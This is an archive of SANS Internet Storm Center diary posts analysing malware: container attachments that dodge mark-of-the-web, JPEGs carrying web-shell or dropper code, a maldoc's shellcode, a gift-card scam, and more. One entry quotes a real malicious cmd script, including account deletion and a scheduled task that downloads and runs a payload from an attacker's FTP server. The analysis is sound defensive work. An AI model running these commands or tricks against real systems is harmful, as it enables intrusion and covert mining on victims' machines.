Tag Archives: SANS

Malicious .tar Attachments, (Sun, Jan 6th)

This post was originally published on this site

We were informed about a malicious email campaign that uses .iso and .tar attachments.

We’ve covered .iso attachments before in diary entry “Malicious .iso Attachments“: the .iso contains a malicious executable and can be opened with vanilla Windows 8 and later.

For .tar attachments, it’s a bit different. The .tar attachment also contains a malicious executable (tar is an Unix archive format), but it can not be opened with vanilla Windows. Archiving software like the popular WinZip has to be installed, for the user to be able to open the .tar attachment.

Adversaries use .tar files for the same reason as .iso files:

1) the malware is contained in a container file, and can thus more easily evade detection

2) the “mark-of-the-web” is not propagated

The “mark-of-the-web” is metadata that indicates that a file originated from the Internet, and has thus a lower trust value. It is implemented with alternate data streams. Applications like Outlook create this metadata: when an attachment is opened or saved to disk, the metadata is created to mark it as originating from the Internet.

Here is a .tar file (Dialog42.tar, containing Dialog42.exe) with metadata to mark it as originating from the Internet:

When the .tar file is opened with WinZip to extract the .exe file, the metadata is not propagated to the extracted .exe file:

When the executable is started, no warning is displayed:

If the “mark-of-the-web” would have been propagated (e.g. the metadata would have been copied from the container to the extracted files), then the user would receive a warning before the file was executed:

Using less popular container formats on Windows allows malware authors to evade detection and reduce the number of alerts, at the risk of ending up on a Windows machine that can not open the container.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A Malicious JPEG? Second Example, (Sat, Jan 5th)

This post was originally published on this site

The JPEG image I wrote about in yesterday’s diary entry “A Malicious JPEG?” reminded me of another example that was mentioned on Twitter a couple of weeks ago.

The JPEG image mentioned in that Tweet (71dedb3a79245edb0b4987c2754f515c) is indeed a valid JPEG:

In this report by jpegdump.py, we can see that this JPEG image is composed of all the right segments. But notice that there is data appended after the End Of Image (EOI) segment: entry 13 *trailing*.

We can select entry 13 to take a peek inside:

It’s a VBS script that writes a file to disk and executes it. The dropped file is embedded as a long hexadecimal string: this can be extracted with base64dump.py:

The embedded file is a malicious executable (MZ): ff5e1f27193ce51eec318714ef038bef. This is a Ramnit worm sample, first submitted to VirusTotal in 2010 (the JPEG file was first submitted in December 2018).

Like the JPEG image discussed in yesterday’s diary entry, the malicious content of this JPEG image will not execute when the image is viewed with an image viewer or browser.

For the script to execute, this JPEG file has to be opened as an HTML application (HTA). mshta.exe, the application that executes HTA files, ignores all the binary data of the JPEG image and parses and executes the script between the <SCRIPT> tags. This can be achieved by saving the JPEG image with .hta extension, and then launch it. Or by running mshta.exe with an URL as argument that points to this JPEG image.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A Malicious JPEG?, (Fri, Jan 4th)

This post was originally published on this site

I was given a JPEG image detected by an anti-virus. As you can see on VirusTotal, several AVs detect this JPEG image. Could I tell if this image could have infected the Windows machine it was found on?

Let’s take a look.

FF D8 is the first segment of a JPEG image (SOI: Start Of Image).This is indeed a JPEG file, and we can analyze it with a tool I developed to analyze JPEG files: jpegdump.py:

jpegdump produces a list of the segments found inside the jpeg image. The 3rd segment, FF FE or COM, is a comment. jpeg images can contain comments, but it’s rather unusual to find them in jpeg images.

We can select the COM segment  to see what’s inside:

It contains a PHP command, and that’s what triggers the AVs on VirusTotal: I removed the PHP command, and the jpeg no longer triggers AVs on VirusTotal.

This image can not infect a Windows machine when it is viewed. Comment segments are parsed and ignored by image viewers (including browsers), they are not executed.

So why does this image trigger AVs, and why does it contain this comment?

Images like these have been going around for several years (this one was actually first submitted to VirusTotal in 2013): they are used on compromised servers, to hide a web shell. To evade detection, adversaries split up the components of their web shell over several files, sometimes even over different servers. A PHP eval command like this is hidden inside a file like an image, to be then retrieved by another component and executed.

China Chopper is an old example of such a web shell, that has been documented in depth.

If you find such a file on a Windows machine (for example in the browser cache), the Windows machine has not been infected. No reason to worry. Unless it was downloaded from a server you own, then you have to take a close look at that server.

If you find such a file on a server, especially on a PHP webserver, then there’s a high probability that your server is compromised.

I’ve been seeing such jpeg images for many years, because they trigger the anti-virus on Windows machines when users browse web servers that host such jpeg images. The PHP command is often hidden in the EXIF metadata, or sometimes just appended to the end of the jpeg image (after FF D9 EOI, End Of Image).


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious Script Leaking Data via FTP, (Wed, Jan 2nd)

This post was originally published on this site

The last day of 2018, I found an interesting Windows cmd script which was uploaded from India (SHA256: dff5fe50aae9268ae43b76729e7bb966ff4ab2be1bd940515cbfc0f0ac6b65ef) with a very low VT score[1]. The script is not obfuscated and contains a long list of commands based on standard Windows tools. Here are some examples:

It removes existing users and kills processes:

net1 user mm123$ /del
net1 user admin1$ /del
net1 user sysadm05 /del
taskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe

It changes access rights on executable files:

attrib -s -h -r C:UsersDefaultAppDataLocalTemp*.exe
attrib -s -h -r C:UsersDefaultAppDataRoamingTempo*.exe
attrib -s -h -r C:UsersDefaultAppDataRoaming*.exe
attrib -s -h -r C:UsersaspAppDataLocalTemp*.exe
attrib -s -h -r C:UsersaspAppDataRoamingTempo*.exe
attrib -s -h -r C:UsersaspAppDataRoaming*.exe
attrib -s -h -r C:UsersadministratorAppDataLocalTemp*.exe
attrib -s -h -r C:UsersadministratorAppDataRoamingTempo*.exe
attrib -s -h -r C:UsersadministratorAppDataRoaming*.exe
cacls C:UsersaspAppDataRoamingTempo*.exe /e /d everyone
cacls C:UsersadministratorAppDataRoamingTempo /e /d everyone
cacls C:UsersaspAppDataRoamingTempo*.exe /e /d system
cacls C:UsersDefaultAppDataRoamingTempo*.exe /e /d everyone
cacls C:UsersadministratorAppDataRoamingTempo /e /d system
cacls C:UsersDefaultAppDataRoamingTempo /e /d system
cacls C:UsersDefaultAppDataRoamingTempo /e /d everyone
cacls C:UsersDefaultAppDataRoamingTempo*.exe /e /d system

It creates scheduled tasks for persistence:

schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp[.]1226bye[.]xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:windowshelplsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:windowshelplsmosee.exe" /ru "system"  /sc onstart /F

Files are downloaded from a FTP server. The downloaded PE files is in the case above a cryptominer (SHA256: 7f78d8a2cf889230fcd0dcd3d12418835c6c2e37ea396c13ae5222eccd978e8a[2]). It downloads more interesting files, again from a FTP server. One of them is a text file containing a list of processes to kill:

conime.exe,C:Program Files (x86)Common Filesconime.exe,1
svshpst.exe,C:Program Files (x86)Common Filessvshpst.exe,1
svchsot.exe,C:Program FilesCommon FilesSystemsvchsot.exe,1
csrswz.exe,C:Program FilesCommon Filescsrswz.exe,1

Powershell scripts were also downloaded and executed to perform interesting activities. The most interesting one? The infected systems connect to another FTP server and upload a flat file based on the victim’s IP addresses: ‘<publicip>_<localip>.txt’. Files contain: the Windows version, the CPU usage (percentage) and a list of all running processes. Once a file is uploaded, I tried to access some of them but another process on the malicious FTP server was collecting them in real time. However, it was possible to list them (well most of them). I wrote a quick script to keep an eye on the FTP server and left it running for 2 days. 35984 unique IP addresses were collected! The top 5 of infected countries is:

  • Russia
  • China
  • Taiwan
  • Ukraine
  • India

Who said that cryptominers are not popular?

[1] https://www.virustotal.com/#/file/dff5fe50aae9268ae43b76729e7bb966ff4ab2be1bd940515cbfc0f0ac6b65ef/detection
[2] https://www.virustotal.com/#/file/7f78d8a2cf889230fcd0dcd3d12418835c6c2e37ea396c13ae5222eccd978e8a/detection

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Gift Card Scams on the rise, (Wed, Jan 2nd)

This post was originally published on this site

Most people are very helpful and try to be good neighbors and citizens.  This is even more prevalent with the holiday season.  There are those who take advantage of the season and people’s helpfulness in order to scam them out of money.  One that is hitting right now, with a very targeted approach, are gift card scams.  These have not just occurred during the holidays, but there are more reports of them occurring during the season of giving.  The flow of the scam is generally the same for most of these that are being reported.  An individual is targeted by someone purporting to be their management from higher up in the chain of command.  The request is usually via email with a urgent demand for the purchase of gift cards to give to clients.  The attacker has done their research to learn the personnel that work in the particular office.  Here is an example of one of the scams that was submitted to us by Keegan Mills.  The names have been changed/obfuscated in the incident.

Background information: “Spoofed_Pres” is the president/CEO of the company. Her contact information is widely distributed.  The initial target, “Target_One”, was very new to the company in a junior position.  According to Keegan: “We were a bit surprised the actors even found her as a contact.”  Due to the number of emails exchanged (over 30) in the attempt to fulfil this request, I am only showing a few of the key one’s here in the thread.

The first contact came as an urgent request from the CEO to see if “Target_One” was in the office.  The name that appeared was the correct name of the CEO, but it was not the correct email address:


Once Target_One responded that they were in the office, the directions followed:


Target_One contacted the correct POC at the company to get the company card and help was enlisted from two other people (at one point three others) in order to fulfil the request for the urgent gift cards.  However, there was an issue with the credit card not working at the store.  At this point, Target_One is instructed to use their own funds to buy the cards and they will be reimbursed. 


Also, as soon as they were able to get the gift cards, they should send a picture of the PIN immendiately.  This was a reoccuring theme through the email exchange.  They could not get that many cards from a single location, so they were attempting multiple stores.  Also, commute to get to stores factors into the time this scenario plays out.


This entire effort last for about five hours when it was finally realized that it was not a legitmate email from the CEO/President.   I don’t know if any gift cards were actually purchased, however, think about the time lost and cost salary wise:  five hours of salary for three people at a minimum!  Then there is the time to work the incident and do any mitigation afterwards.

We received several examples of these and the verbiage is not verbatim between them.  Here is another example of one (Thank you Brad Theodore):


I am including this exchange for you read on your own if you wish.  Its another example of the gift card attempts (thank you Chris Rovers) and a user who had a conversation with the scammer, before questioning if they should really be doing this:  https://isc.sans.edu/diaryimages/files/GiftCardPhish_Anonymized.txt

Before you think this could never happen in your company, be careful!  This was a targeted attack, not just a phishing attempt.  A new employee gets an urgent email from a superior that asks them for help immediately.  They will jump through hoops to help!!  Especially if the superior is in a meeting and needs it ASAP.  The attackers are taking the time to do their research and change their tactics.  We need to make sure we are taking the time to really train our employees as well.  

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Maldoc with Nonfunctional Shellcode, (Wed, Jan 2nd)

This post was originally published on this site

Maldoc 15ee2c2f3f01eda532b91dff9f4bcc53 is a malicious RTF document with an exploit for an old vulnerability (%%cve:2010-3333%%).

If you open this document in a sandbox, you will not see malicious activity. That’s because the shellcode it contains, triggered by the exploit, is nonfunctional. A static analysis is required to know more about this maldoc.

A static analysis is not too difficult. It’s an RTF document, and can thus be analyzed with rtfdump.py:

There are not many items, and we can see that item 11 contains many hexadecimald characters (h=938).

This can be decoded with the following command:

From the anti-virus alerts on VirusTotal, we know that there is an exploit in this document. String AAAA… is often used to overflow buffers.

 And at the end we see a small command. If you pay close attention to the dump, you might even reconstruct the string urlmon.

So this is very likely shellcode, probably a downloader. But where is the URL?

Let’s write this binary data to disk and analyze it with NASM‘s disassembler:

This is not shellcode, but if we look after the buffer overflow string AAA… 0x41 0x41 0x41…), we see a jump instruction, and more importantly, a reference to FS 0x30.

On Windows 32-bit, the FS segment register is used to access the Thread Information Block. And offset 0x30 gives access to the Process Environment Block. These data structures are often accessed by shellcode to lookup Win32 API addresses.

Hence, it’s very likely that address 0xEF is the entrypoint of the shellcode. We can try that out with the shellcode emulator scdbg: it has an option to provide the entrypoint (-foff). We’ll let the emulation start from address EF:

This is indeed shellcode and 0xEF is the entrypoint: this shellcode downloads a payload, writes it to disk as a.exe and then executes it. But we see no URL.

Let’s grep for URLDownloadToFile and see what gets written on the stack (option -vv increases the verboseness to a level where we see the registry values at each instruction emulation):

Register edi contains the address of the URL: 0x004011D5. What do we find at this address? Nothing:

This shellcode can’t download anything, because the malware made a mistake and did not include the URL.

If you really want to be shure that this shellcode is a downloader, and that the only thing missing is the URL, you can add your own URL to the shellcode and emulate it. This can be done with option -spoke (string poke): this option allows you to write a string to memory before the shellcode gets emulated. Let’s write a URL at address 0x4011D5 like this:

This confirms it: the emulated shellcode now downlaods from the URL we provided.

It doesn’t happen often, but you can be in a position that you have to analyze non-working malware. Here, our analysis could not reveal the payload, simply because the URL is missing.

There are functional variants of this exploits on VirusTotal, like this one.

You can even find a sample on GitHub.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Make a Wheel in 2019!, (Tue, Jan 1st)

This post was originally published on this site

I want to inspire you to take the time to create something in 2019. A program, a protocol, a policy, a howto, … Something, anything, that brings you out of your comfort zone.

It doesn’t have to be something complex. Simple works too.

The process of creation is important, not so much the end result (the journey matters more than the destination here).

Because you want this creation process to help you acquire new skills and gain new understandings.

If you can, make something that you will use, because that will motivate you to continue your yourney.

It doesn’t have to be something new. Making a wheel is not the same as “reinventing the wheel”. When you want to learn how to make wheels, you’re not reinventing wheels.



I started making my PDF tools in 2008. Not because there were no “low-level” PDF analysis tools (PDF Structazer was the first, if I’m not mistaken), but because I wanted to understand the internals of PDFs. Making tools to parse PDF documents was and still is a very interesting journey for me. One day, I want to start another journey: rewrite my PDF tools, because they have evolved incrementaly while my PDF understanding grew, and I would develop them quite differently now with all I’ve learned during this journey. But that is another story.

Choose a stimulating journey! Acquire new skills, gain a deeper understanding along the way! Don’t worry about the destination.


Happy New Year from the Internet Storm Center!

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Software Crashes: A New Year’s Resolution, (Mon, Dec 31st)

This post was originally published on this site

Recently, I experienced a couple of stop errors (also known as Blue Screen of Death) on a Windows machine, that I was able to fix with the help of NirSoft’s BlueScreenView utility. With this utility, I immediately pinpointed the cause of the crashes to a driver that I was able to update.

And that reminded me of another NirSoft tool: AppCrashView.

Like BlueScreenView, AppCrashView is a convenient GUI programs that presents application crash reports found in the WER folder in a table:

I used to take a regular look at the application crashes on my machine, to identify applications who could have security problems, like buffer overflows. Depending on the results and frequency of crashes, I would update or replace the application.
And sometimes, it was the starting point of vulnerability research.

I will make this a habit again, and you could too, as AppCrashView is a simple, convenient program that gives an tabular overview of application crashes, without requiring a debugger.
If you want to do this in a more organized and scalable way, know that application crashes are also recorded in the Windows Application Event log.

Please post a comment if you have tips or suggestions to monitor application crashes.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

OWASP Top 10 Internet of Things 2018″, (Sun, Dec 30th)

This post was originally published on this site

OWASP released “OWASP Top 10 Internet of Things 2018”. “The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies.”

1-Weak, Guessable, or Hardcoded Passwords:

Use of easily bruteforced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems.

2-Insecure Network Services :

Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control…

3-Insecure Ecosystem Interfaces

Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allows compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.

4-Lack of Secure Update Mechanism

Lack of ability to securely update the device. This includes lack of firmware validation on device, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, and lack of notifications of security changes due to updates.

5-Use of Insecure or Outdated Components

Use of deprecated or insecure software components/libraries that could allow the device to be compromised. This includes insecure customization of operating system platforms, and the use of third-party software or hardware components from a compromised supply chain.

6-Insufficient Privacy Protection

User’s personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.

7-Insecure Data Transfer and Storage
Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.

8-Lack of Device Management

Lack of security support on devices deployed in production, including asset management, update management, secure decommissioning, systems monitoring, and response capabilities.

9-Insecure Default Settings

Devices or systems shipped with insecure default settings or lack the ability to make the system more secure by restricting operators from modifying configurations.

10-Lack of Physical Hardening
Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.




(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Video: De-DOSfuscation Example, (Sat, Dec 29th)

This post was originally published on this site

I created a video showing how to de-obfuscate a DOSfuscated PowerShell command obtained from a maldoc I analyzed in diary entry “De-DOSfuscation Example“:

This is the obfuscated command:

In the video, I rely mainly on my tool numbers-to-string to do the de-obfuscation.


Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.